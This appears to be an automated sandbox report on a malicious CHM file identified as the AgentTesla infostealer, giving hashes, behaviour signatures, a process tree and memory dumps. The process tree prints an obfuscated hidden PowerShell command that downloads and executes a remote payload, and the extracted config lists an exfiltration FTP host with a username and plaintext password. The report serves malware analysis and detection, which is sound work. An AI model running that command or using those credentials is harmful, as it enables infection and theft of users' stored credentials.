Analysis
- max time kernel: 171s
- max time network: 237s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08-12-2022 08:13

Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample: mel9.chm, resource: win7-20220812-en)
- Behavioral task: behavioral2 (sample: mel9.chm, resource: win10v2004-20220901-en)
General
- Target: mel9.chm
- Size: 13KB
- MD5: e7a3bc55f52eebb6ce7df0a0047fec40
- SHA1: b152e0d6abc8dab4500aaa4161dac968e54cad20
- SHA256: 908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
- SHA512: 3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
- SSDEEP: 192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Malware Config
Extracted (download URL)
- https://cricot2.kylos.pl/mel9.txt
Extracted (agenttesla)
- Protocol: ftp
- Host: ftp://ftp.peva.it
- Port: 21
- Username: anita@peva.it
- Password: Team2318!@#
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 12: pid 3400, powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes:
    pid 3400, powershell.exe
    pid 3400, powershell.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes:
    RegAsm.exe, key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    RegAsm.exe, key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    RegAsm.exe, key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    pid 3400 (powershell.exe) set thread context of pid 4140 (RegAsm.exe)
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid 3400, powershell.exe (2 events)
    pid 4140, RegAsm.exe (2 events)
- Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes:
    pid 3400, powershell.exe: Token SeDebugPrivilege, followed by this sequence of 21 tokens, recorded twice:
      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
      SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
      SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
      SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
      33, 34, 35, 36
    pid 4140, RegAsm.exe: Token SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid 4972, hh.exe (2 events)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
    pid 4972 (hh.exe) wrote to memory of pid 3400 (powershell.exe): 2 events
    pid 3400 (powershell.exe) wrote to memory of pid 4140 (RegAsm.exe): 8 events
- outlook_office_path (1 IoC)
  Processes:
    RegAsm.exe, key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- outlook_win_path (1 IoC)
  Processes:
    RegAsm.exe, key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes (tree; depth shown by indentation)
- [1] C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Accesses Microsoft Outlook profiles
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Downloads
- C:\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dll
  Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
- C:\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dll
  Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
Memory dumps (pid-index: address range, size)
- memory/3400-142: 0x00007FF946430000-0x00007FF946EF1000, 10.8MB
- memory/3400-135: 0x00007FF946430000-0x00007FF946EF1000, 10.8MB
- memory/3400-137: 0x00007FF9416B0000-0x00007FF9417FE000, 1.3MB
- memory/3400-134: 0x00000286BC340000-0x00000286BC362000, 136KB
- memory/3400-133: 0x0000000000000000 (mapping.dmp)
- memory/4140-139: 0x0000000000400000-0x000000000043C000, 240KB
- memory/4140-140: 0x0000000000437A7E (mapping.dmp)
- memory/4140-141: 0x0000000005780000-0x0000000005D24000, 5.6MB
- memory/4140-143: 0x0000000005390000-0x000000000542C000, 624KB
- memory/4140-144: 0x0000000006070000-0x00000000060D6000, 408KB
- memory/4140-145: 0x0000000006530000-0x0000000006580000, 320KB
- memory/4140-146: 0x00000000066A0000-0x0000000006732000, 584KB
- memory/4140-147: 0x00000000068B0000-0x00000000068BA000, 40KB